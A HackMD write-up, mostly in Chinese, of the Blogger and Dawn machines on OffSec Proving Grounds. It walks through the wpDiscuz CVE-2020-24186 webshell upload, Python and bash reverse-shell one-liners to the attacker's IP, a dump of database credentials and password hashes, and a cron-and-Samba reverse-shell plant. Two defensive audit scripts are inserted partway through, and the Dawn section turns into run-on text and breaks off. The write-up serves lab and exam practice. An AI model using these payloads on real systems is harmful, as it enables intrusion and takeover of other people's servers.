---
title: '[OSCP, PEN-200] Proving Grounds Play - Linux'
disqus: hackmd
---

[OSCP, PEN-200] Proving Grounds Play - Linux
===

# Table of Contents
[TOC]

# Blogger

![image](https://hackmd.io/_uploads/Hyd8as82kg.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 192.168.117.217
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 04:22 EDT
Nmap scan report for 192.168.117.217
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Blogger | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
```

Check which SSH authentication methods are allowed:

```
┌──(chw㉿CHW)-[~]
└─$ nmap --script ssh-auth-methods -p22 192.168.117.217
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 04:23 EDT
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-auth-methods:
|   Supported authentication methods:
|_    publickey

Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
```

> Only `publickey` is allowed, so password brute-forcing is not an option.

#### 1.2 dirsearch

```
┌──(chw㉿CHW)-[~]
└─$ dirsearch -u http://192.168.117.217
...
[04:50:33] 301 -  319B  - /assets  ->  http://192.168.117.217/assets/
[04:50:33] 200 -  475B  - /assets/
[04:50:45] 301 -  316B  - /css  ->  http://192.168.117.217/css/
[04:50:57] 301 -  319B  - /images  ->  http://192.168.117.217/images/
[04:50:57] 200 -  693B  - /images/
[04:51:01] 200 -  603B  - /js/
```

#### 1.3 Browse /assets/

![image](https://hackmd.io/_uploads/SywTHh8nJg.png)

The page source embeds many paths under http://blogger.pg/...

![image](https://hackmd.io/_uploads/BJO9I3U2kg.png)

> But they cannot be browsed yet.

#### 1.4 /etc/hosts

```
┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts
192.168.117.217 blogger.pg
```

Browse http://blogger.pg/assets/fonts/blog/wp-includes/ again:

![image](https://hackmd.io/_uploads/SJTovh82kl.png)

> WordPress

Found the WordPress login page:
http://blogger.pg/assets/fonts/blog/wp-login.php

![image](https://hackmd.io/_uploads/rJaxF2U3ke.png)

#### 1.5 WPScan

```
┌──(chw㉿CHW)-[~]
└─$ wpscan --url http://blogger.pg/assets/fonts/blog/ --enumerate p --plugins-detection aggressive
...
[+] akismet
 | Location: http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.8 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

[+] wpdiscuz
 | Location: http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/
 | Last Updated: 2025-02-20T16:52:00.000Z
 | Readme: http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.28
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
```

> Two outdated plugins found: `akismet` and `wpdiscuz`

### 2. searchsploit

#### 2.1 akismet

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit akismet
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities                                                              | php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting                                                                                 | php/webapps/30036.html
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

> Versions do not match.

#### 2.2 wpdiscuz

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit wpdiscuz
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)                                                             | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)                                                             | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)                                                  | php/webapps/49401.rb
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

> All three exploits match the installed version.

### 3. Exploit

#### 3.1 Try `49967.py`: CVE-2020-24186

```
┌──(chw㉿CHW)-[~]
└─$ searchsploit -x 49967

┌──(chw㉿CHW)-[~]
└─$ searchsploit -m 49967
```

The exploit needs the path of a post with a comment section: `http://blogger.pg/assets/fonts/blog/?p=29`
(the upload goes through the comment form)

```
┌──(chw㉿CHW)-[~]
└─$ python3 49967.py -u http://blogger.pg/assets/fonts/blog/ -p ./?p=29
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
---------------------------------------------------------------

[+] Response length:[59354] | code:[200]
[!] Got wmuSecurity value: 444df237a3
[!] Got wmuSecurity value: 29
[+] Generating random name for Webshell...
[!] Generated webshell name: oywknkrctpnlpmt

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url&quot;:&quot;http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/03/oywknkrctpnlpmt-1742290432.2863.php&quot;

> id

[x] Failed to execute PHP code...
```

> Command execution failed, but it printed the webshell path.
> Try browsing http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/03/abbfeiyqkffmvqv-1742290331.3557.php?cmd=ls

![image](https://hackmd.io/_uploads/rk8U03Ihyx.png)

> It works.
> Next, try to get a reverse shell through it.

#### 3.2 Reverse Shell

First test whether the server can reach Kali:
`cmd=curl -v http://192.168.45.214`

```
┌──(chw㉿CHW)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.117.217 - - [18/Mar/2025 05:41:37] "GET / HTTP/1.1" 200 -
```

Tried the following:

```
/bin/bash -i >& /dev/tcp/192.168.45.214/8888 0>&1
nc -e /bin/sh 192.168.45.214 8888
```

> Neither works; the guess is that the webshell process is terminated as soon as the command finishes.

Try a Python socket payload:

```
?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# If the target has no python3, python2 can be tried:
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```

> Success

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.214] from (UNKNOWN) [192.168.117.217] 55592
/bin/sh: 0: can't access tty; job control turned off
$
$ whoami
www-data
$ cd /
$ ls
...
$ ls /home
james  ubuntu  vagrant
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /etc/shadow
cat: /etc/shadow: Permission denied
$ grep "CRON" /var/log/syslog
grep: /var/log/syslog: Permission denied
```

> `www-data` has very limited privileges.

### ✅ Get User Flag

> User flag found in `/home/james`

## Privileges Escalation

### 4. LinPEAS

```
┌──(chw㉿CHW)-[/]
└─$ which linpeas
/usr/bin/linpeas

┌──(chw㉿CHW)-[/]
└─$ cp /usr/bin/linpeas /home/chw/Desktop/upload_file

┌──(chw㉿CHW)-[/]
└─$ cd /home/chw/Desktop/upload_file

┌──(chw㉿CHW)-[~/Desktop/upload_file/linpeas]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

```
$ bash -i
www-data@ubuntu-xenial:/$ cd /tmp
cd /tmp
www-data@ubuntu-xenial:/tmp$ wget http://192.168.45.214/linpeas.sh
www-data@ubuntu-xenial:/tmp$ chmod +x linpeas.sh
www-data@ubuntu-xenial:/tmp$ ./linpeas.sh
...
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 www-data root 2878 Jan 17  2021 /var/www/wordpress/assets/fonts/blog/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'sup3r_s3cr3t');
define('DB_HOST', 'localhost');
```

### 5. MySQL

```
www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t'
mysql -u root -p'sup3r_s3cr3t'
show databases ;
exit
Database
information_schema
mysql
performance_schema
wordpress
www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t'
mysql -u root -p'sup3r_s3cr3t'
use wordpress;
show tables;
exit
Tables_in_wordpress
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_termmeta
wp_terms
wp_usermeta
wp_users
wp_wc_avatars_cache
wp_wc_comments_subscription
wp_wc_feedback_forms
wp_wc_follow_users
wp_wc_phrases
wp_wc_users_rated
wp_wc_users_voted
www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t'
mysql -u root -p'sup3r_s3cr3t'
use wordpress;
select * from wp_users;
exit
ID  user_login  user_pass                           user_nicename  user_email         user_url  user_registered      user_activation_key  user_status  display_name
1   j@m3s       $P$BqG2S/yf1TNEu03lHunJLawBEzKQZv/  jm3s           admin@blogger.thm            2021-01-17 12:40:06                       0            j@m3s
www-data@ubuntu-xenial:/$
```

> Not sure why the output only shows up after `exit;`
> Either way, we have the hash.

### 5. Hashcat

```
┌──(chw㉿CHW)-[~]
└─$ hashid '$P$BqG2S/yf1TNEu03lHunJLawBEzKQZv' -m
Analyzing '$P$BqG2S/yf1TNEu03lHunJLawBEzKQZv'
[+] Juniper Netscreen/SSG(ScreenOS) [Hashcat Mode: 22]

┌──(chw㉿CHW)-[~]
└─$ hashcat -m 22 oscp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
```

> No result.

### 6. Default password

It turned out that `vagrant` still uses its default password.

```
www-data@ubuntu-xenial:/$ su vargrant
su vargrant
su: must be run from a terminal
www-data@ubuntu-xenial:/home/vagrant$ script -qc "/bin/su vagrant" /dev/null
script -qc "/bin/su vagrant" /dev/null
Password: vagrant
vagrant@ubuntu-xenial:~$
```
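Both WordPress findings above (the webshell that landed in `wp-content/uploads/` in §3.1, and the world-readable `wp-config.php` handing out the MySQL root password in §4) can be caught by a small host-side audit. The script below is an added example, not part of the original writeup; it builds a constructed WordPress tree in a temp directory (file names, password and paths are invented) and audits it.

```python
"""Audit a WordPress install for the two Blogger findings (added example, constructed data):
1. executable PHP files inside wp-content/uploads (where the wpDiscuz upload landed);
2. a wp-config.php that is world-readable or uses the MySQL root account.
"""
import re
import stat
import tempfile
from pathlib import Path

# Extensions commonly mapped to the PHP handler. Every suffix of a name is inspected,
# so a double extension such as shell.php.jpg is caught as well.
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"](.*?)['"]\s*\)""")


def scan_uploads(uploads_dir):
    """Return upload-relative paths that look like PHP, by extension or by content."""
    uploads_dir = Path(uploads_dir)
    findings = []
    for path in uploads_dir.rglob("*"):
        if not path.is_file():
            continue
        by_ext = any(s.lower() in PHP_EXTENSIONS for s in path.suffixes)
        with path.open("rb") as fh:
            by_content = PHP_OPEN_TAG.search(fh.read(4096)) is not None
        if by_ext or by_content:
            findings.append(path.relative_to(uploads_dir).as_posix())
    return sorted(findings)


def audit_wp_config(config_path):
    """Return human-readable issues for a wp-config.php (file mode and DB credentials)."""
    config_path = Path(config_path)
    issues = []
    mode = stat.S_IMODE(config_path.stat().st_mode)
    if mode & stat.S_IROTH:
        # The web server must read the file, but every local account must not:
        # on Blogger this is exactly how www-data obtained the DB root password.
        issues.append(f"wp-config.php is world-readable (mode {mode:o}); use 640 owned by the web server user")
    defines = dict(DEFINE_RE.findall(config_path.read_text(encoding="utf-8", errors="replace")))
    if defines.get("DB_USER") == "root":
        issues.append("DB_USER is the MySQL root account; create a least-privilege user for the wordpress database")
    if not defines.get("DB_PASSWORD"):
        issues.append("DB_PASSWORD is empty")
    return issues


def demo():
    """Build a constructed WordPress tree showing both problems and audit it."""
    root = Path(tempfile.mkdtemp(prefix="wp-audit-"))
    uploads = root / "wp-content" / "uploads" / "2025" / "03"
    uploads.mkdir(parents=True)
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed jpeg header")
    (uploads / "uploaded-1742290432.2863.php").write_bytes(b"<?php echo 'constructed stand-in'; ?>")
    (uploads / "avatar.php.jpg").write_bytes(b"<?php echo 'double extension'; ?>")
    config = root / "wp-config.php"
    config.write_text(
        "<?php\n"
        "define('DB_NAME', 'wordpress');\n"
        "define('DB_USER', 'root');\n"
        "define('DB_PASSWORD', 'constructed-password');\n"
        "define('DB_HOST', 'localhost');\n"
    )
    config.chmod(0o644)  # the -rw-r--r-- mode LinPEAS reported on Blogger
    return scan_uploads(root / "wp-content" / "uploads"), audit_wp_config(config)


if __name__ == "__main__":
    php_files, config_issues = demo()
    print("PHP in uploads:", php_files)
    print("wp-config.php issues:", config_issues)
```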
### 7. sudo -l

```
vagrant@ubuntu-xenial:~$ sudo -l
sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
vagrant@ubuntu-xenial:~$ sudo -i
sudo -i
root@ubuntu-xenial:~# whoami
whoami
root
root@ubuntu-xenial:~# ls /root
ls /root
proof.txt
root@ubuntu-xenial:~# cat /root/proof.txt
cat /root/proof.txt
```

### ✅ Get Root FLAG

# Dawn

![image](https://hackmd.io/_uploads/r1DwXyO2kg.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 192.168.117.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 02:27 EDT
Nmap scan report for 192.168.117.11
Host is up (0.11s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MariaDB 5.5.5-10.3.15
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 15
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, SupportsCompression, SupportsLoadDataLocal, ODBCClient, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: %RNph;.qre(2d$"|l*+9
|_  Auth Plugin Name: mysql_native_password
Service Info: Host: DAWN

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2025-03-19T02:27:43-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-03-19T06:27:42
|_  start_date: N/A
|_clock-skew: mean: 1h20m02s, deviation: 2h18m34s, median: 1s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.30 seconds
```

> HTTP, MySQL & Samba

#### 1.2 dirsearch

```
┌──(chw㉿CHW)-[~]
└─$ dirsearch -u http://192.168.117.11/
...
[02:32:30] 301 -  315B  - /logs  ->  http://192.168.117.11/logs/
[02:32:30] 200 -  505B  - /logs/
```

Browse http://192.168.117.11/logs/

![image](https://hackmd.io/_uploads/HyGYrku2ke.png)

> auth.log (403)
> daemon.log (403)
> error.log (403)
> management.log (200)

Browse `management.log`:

![image](https://hackmd.io/_uploads/HkmxZb_nye.png)

#### 1.3 Enum4linux

```
┌──(chw㉿CHW)-[~]
└─$ enum4linux -a 192.168.117.11
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 19 03:51:05 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.117.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
 ===============================( Getting domain SID for 192.168.117.11 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

 ==================================( OS information on 192.168.117.11 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.117.11 from srvinfo:
        DAWN           Wk Sv PrQ Unx NT SNT Samba 4.9.5-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ======================================( Users on 192.168.117.11 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.117.11 )================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            WIN2K3STDVIC

[+] Attempting to map shares on 192.168.117.11
...
[+] Password Info for Domain: DAWN

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

 ======================================( Groups on 192.168.117.11 )======================================

[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 =================( Users on 192.168.117.11 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-4292367078-475864837-953252120 and logon username '', password ''
S-1-5-21-4292367078-475864837-953252120-501 DAWN\nobody (Local User)
```

> `//192.168.117.11/ITDEPT Mapping: OK Listing: OK Writing: N/A`
> `ITDEPT`: the share can be read (Mapping: OK, Listing: OK, Writing: N/A), but apparently not written to.

### 2. Smbclient

Use smbclient to look at the share:

```
┌──(chw㉿CHW)-[~]
└─$ smbclient -N //192.168.117.11/ITDEPT
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Wed Jul 22 13:19:41 2020

                7158264 blocks of size 1024. 3518852 blocks available
smb: \>
```

> Empty?! It could also be a permissions issue.

🥚 From `management.log` we learn that cron keeps executing `/home/dawn/ITDEPT/product-control` and `/home/dawn/ITDEPT/web-control`.

### 3. Reverse Shell

Plant a reverse shell named `product-control` or `web-control`.

> [!Warning]
> Both the TCP and the UDP variant failed:
> `bash -c 'bash -i >& /dev/tcp/192.168.45.214/8888 0>&1'`
> `bash -i > /dev/udp/192.168.45.214/8888 0>&1`

```
┌──(chw㉿CHW)-[~]
└─$ echo "python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.214",8888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'" >> web-control
```

Start a netcat listener:

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
```

### 4. Upload the reverse shell script

```
smb: \> put web-control
putting file web-control as \web-control (0.1 kb/s) (average 0.1 kb/s)
smb: \> ls
  .                                   D        0  Wed Mar 19 04:40:29 2025
  ..                                  D        0  Wed Jul 22 13:19:41 2020
  web-control                         A       50  Wed Mar 19 04:40:29 2025

                7158264 blocks of size 1024. 3518828 blocks available
smb: \> !bash web-control
```

> Wait for cron to run it.
> [Optional] `!bash web-control`: the script can also be run directly (on Kali).

```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.214] from (UNKNOWN) [192.168.117.11] 34666
/bin/sh: 0: can't access tty; job control turned off
$
$ hostname
dawn
$ whoami
www-data
$
```

### ✅ Get User Flag

> User flag found in `/home/dawn`
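The foothold on Dawn came from a cron job that executes scripts out of a directory that is also an anonymously writable Samba share (`ITDEPT`), so either the file mode or the share definition would have flagged it. The script below is an added example, not part of the original writeup: it cross-checks `/etc/crontab`-style entries against file permissions and `smb.conf` share definitions, using a constructed layout in a temp directory that mirrors the `/home/dawn/ITDEPT` setup above (all paths and contents are invented).

```python
"""Flag cron jobs whose script can be replaced by a low-privilege or remote user.

Added example with constructed input modelled on Dawn: cron runs
/home/dawn/ITDEPT/{web-control,product-control}, and that directory is exported
as the Samba share ITDEPT with guest write access.
"""
import configparser
import stat
import tempfile
from pathlib import Path

TIME_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style lines (which carry a user column)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or environment assignment such as SHELL=/bin/sh
        fields = 1 if line.startswith("@") else TIME_FIELDS  # @reboot/@hourly shortcuts
        parts = line.split(None, fields + 1)
        if len(parts) == fields + 2:
            jobs.append((parts[fields], parts[fields + 1]))
    return jobs


def parse_smb_shares(text):
    """Return {share: (path, writable)} from smb.conf; Samba defaults to read only = yes."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    shares = {}
    for name in cp.sections():
        sec = cp[name]
        path = sec.get("path")
        if name == "global" or not path:
            continue
        writable = (sec.get("writable", sec.get("writeable", "no")).strip().lower() == "yes"
                    or sec.get("read only", "yes").strip().lower() == "no")
        shares[name] = (path.strip().rstrip("/"), writable)
    return shares


def audit(jobs, shares):
    """Return (user, script, reasons) for every job whose script is not trustworthy."""
    findings = []
    for user, command in jobs:
        script = Path(command.split()[0])  # cron executes the first token of the command
        if not script.is_absolute():
            continue  # PATH-relative commands are a separate (also real) problem
        reasons = []
        if script.exists():
            if stat.S_IMODE(script.stat().st_mode) & stat.S_IWOTH:
                reasons.append("script is world-writable")
        else:
            reasons.append("script does not exist, so whoever can create it controls the job")
        if script.parent.exists():
            parent_mode = stat.S_IMODE(script.parent.stat().st_mode)
            if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
                reasons.append("parent directory is world-writable without the sticky bit")
        for name, (share_path, writable) in shares.items():
            if writable and script.as_posix().startswith(share_path + "/"):
                reasons.append(f"script lives inside writable Samba share [{name}]")
        if reasons:
            findings.append((user, script.as_posix(), reasons))
    return findings


def demo():
    """Constructed Dawn-like layout: one writable script, one missing script, one sane job."""
    root = Path(tempfile.mkdtemp(prefix="cron-audit-"))
    itdept = root / "home" / "dawn" / "ITDEPT"
    itdept.mkdir(parents=True)
    itdept.chmod(0o755)
    web_control = itdept / "web-control"
    web_control.write_text("#!/bin/sh\necho constructed\n")
    web_control.chmod(0o777)
    safe = root / "usr" / "local" / "bin" / "backup"
    safe.parent.mkdir(parents=True)
    safe.parent.chmod(0o755)
    safe.write_text("#!/bin/sh\necho constructed\n")
    safe.chmod(0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"* * * * * root {itdept}/web-control\n"
        f"* * * * * root {itdept}/product-control\n"
        f"@hourly root {safe}\n"
    )
    smb_conf = (
        "[global]\n"
        "workgroup = WORKGROUP\n"
        "[ITDEPT]\n"
        "comment = PLEASE DO NOT REMOVE THIS SHARE.\n"
        f"path = {itdept}\n"
        "guest ok = yes\n"
        "read only = no\n"
    )
    return audit(parse_crontab(crontab), parse_smb_shares(smb_conf))


if __name__ == "__main__":
    for user, script, reasons in demo():
        print(f"[{user}] {script}: " + "; ".join(reasons))
```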
Sudo -l ``` www-data@dawn:/home/dawn$ sudo -l sudo -l Matching Defaults entries for www-data on dawn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on dawn: (root) NOPASSWD: /usr/bin/sudo www-data@dawn:/home/dawn$ sudo su sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. sudo: no tty present and no askpass program specified ``` > sudo 不用密碼,但需要 Tty ### 6. 重建 Reverse shell 嘗試在 Reverse shell 中直接建立 Tty\ 另建 `product-control` 可以同時兩個 Reverse shell ``` ┌──(chw㉿CHW)-[~] └─$ cat product-control python3 -c 'import socket,subprocess,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.214",6666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash")' ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 6666 listening on [any] 6666 ... ``` (Smbclient) ``` smb: \> put product-control putting file product-control as \product-control (0.7 kb/s) (average 0.7 kb/s) smb: \> ls -l product-control NT_STATUS_NO_SUCH_FILE listing \-l ``` ### 7. 重試 Sudo -l ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 6666 listening on [any] 6666 ... 
